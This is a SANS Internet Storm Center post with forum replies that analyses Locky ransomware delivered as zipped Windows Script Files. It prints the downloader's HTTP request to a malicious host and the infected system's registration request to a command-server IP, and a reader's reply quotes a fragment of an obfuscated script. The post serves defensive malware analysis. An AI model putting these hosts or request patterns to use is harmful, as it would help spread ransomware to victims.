Threat Level: green Handler on Duty: Bojan Zdrnja

SANS ISC: Today's Locky Variant Arrives as a Windows Script File - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Today's Locky Variant Arrives as a Windows Script File

Pretty much all the Locky variants I have looked at the last couple days arrived as zipped JavaScript files. Today, I got something slightly different. While the e-mail looked the same overall, the file was a zipped Windows Script File (.wsf). Overall, this isn't all that different. "Windows Script" is essentially JavaScript. The only difference is the tag at the beginning of the file.

Today's subject for the e-mail was "Transaction details". Once the user runs the script by double-clicking the file, it will download the actual crypto ransomware.

GET /2tn0o HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0;
 .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: onlybest76.xyz
Connection: Keep-Alive

Just like earlier versions, it then "registers" the infected system with a website that is only identified by its IP address, so you will not see a DNS lookup for it:

POST /data/info.php HTTP/1.1
Accept: */*
Accept-Language: en-us
Referer: http://95.85.19.195/data/
x-requested-with: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Trident/7.0; 
.NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 95.85.19.195
Content-Length: 942
Connection: Keep-Alive  

[post data omitted]

Anti-Malware proves its usual value by doing probably slightly better than a blind chicken in protecting you from this malware. You can download a file with packet capture, mail server logs, and the malware sample here (password: "blind chicken" ).

Between 9am and 1:30pm UTC, I received 1425 e-mails that match this pattern.

 

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

I will be teaching next: Defending Web Applications Security Essentials - SANS San Jose 2019

Johannes

3580 Posts
ISC Handler
Also using HTA files today & on other odd occasions recently https://myonlinesecurity.co.uk/sent-with-genius-scan-for-ios-pretending-to-come-from-your-own-email-address-leads-to-locky-ransomware/
DVK01

21 Posts
Greetings:

I'm pretty sure I just got some malware in the form of a ZIP file containing a .wsf file (XML text). It's a bit long to paste. First few lines:

<?xml?>
<package>
<job id='oevPEW'><script language='JScript'></script><script language='JScript'><![CDATA[
String.prototype.toshibasatelliteLAMODAtiiiyamooo = function() {

If this is of any interest, let me know the best way to get it to you. I'm on an Air Force base, so I may not be able to use methods that work for everyone else.

Thanks.

--
Karl Vogel
vogelke+isc@pobox.com
kvogel

1 Posts
you can upload file via our contact form isc.sans.edu/…
Johannes

3580 Posts
ISC Handler

Sign Up for Free or Log In to start participating in the conversation!